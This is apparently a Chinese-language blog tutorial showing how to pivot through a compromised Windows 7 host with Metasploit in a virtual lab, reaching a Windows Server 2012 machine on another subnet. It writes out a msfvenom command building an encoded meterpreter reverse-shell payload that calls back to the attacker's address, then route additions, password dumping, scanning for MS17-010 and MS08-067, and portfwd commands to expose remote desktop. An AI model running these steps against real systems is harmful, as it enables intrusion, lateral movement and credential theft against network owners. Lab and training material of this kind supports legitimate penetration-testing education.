
使用Metasploit进行路由转发
0x01 前言
在进行渗透测试时,端口转发的主要目的是帮助我们能够访问不在于同一网段上的系统上的特定端口,方便我们进行进一步的渗透测试。
为了更好地理解这一点,我用虚拟机来演示这个步骤,假设我们已经进入了 网络范围为192.168.123.0/24的这一个网段,目标是192.168.206.200
0x02环境
Attacker ip: 192.168.123.178 --> parrot
中转ip: 192.168.123.164 --> windows7
target ip: 192.168.206.200 --> win2012



0x03 实验步骤
这上面三张图已经显示环境的大概信息了,现在的问题就两个:
- 我怎么去构建实验环境,目标机上面有两个ip或者多个
- 我怎么通过我的parrot去渗透win2012,因为我们不在同一个网段
先说第一个:
我们虚拟机有添加网络适配器的功能,选择桥接模式就好了。


在windows7和windows 2012的虚拟机中都这么添加即可!
生成payload
先生成一个payload放在win7上,获得一个session先。
msfvenom -p windows/meterpreter/reverse_tcp -e /x86/shikata_ga_nai -i 5 LHOST=192.168.123.178 LPORT=1234 -f exe -o /root/wing.exe

在root目录下用建立一个简单的http服务器:
python -m SimpleHTTPServer



成功获得session

查看目标的ip段:

添加一条路由:
background
route add 192.168.206.200 255.255.255.0 1
route print
#实战中建议直接route add 192.168.206.0 255.255.255.0 1

现在就能用msf扫描目标

我这里的目标机是win2012,所以不能直接利用漏洞,内网中17-010和08-067还是蛮多的,直接批量扫描即可!
下面就是常规操作:
迁移进程:

读密码:


得到这个密码后,扫描3389一下,刚刚扫描已经完成了,是开放的,立马做一个的端口转发,利用
portfwd
。portfwd 是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到本地,并且监听.使用方法如下:
meterpreter > portfwd
0 total local port forwards.
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional).
-h Help banner.
-l <opt> The local port to listen on.
-p <opt> The remote port to connect to.
-r <opt> The remote host to connect to.
其实就是把远程端口映射到本地。
什么是映射呢?这就要说到我们可爱的高等数学了。就是一一映射。行吧,我抽风了。QWQ
command:
portfwd add -l 3389 -r 192.168.206.200 -p 3389
验证:

ok!
远程桌面连接:
rdesktop 127.1.1.0:3389
我的parrot好像不支持这玩意。。。
说显示器无法打开。kali下应该没问题,自测吧。
balalalalala!
下次介绍如何增强你可视化武器-->"cs"
网友评论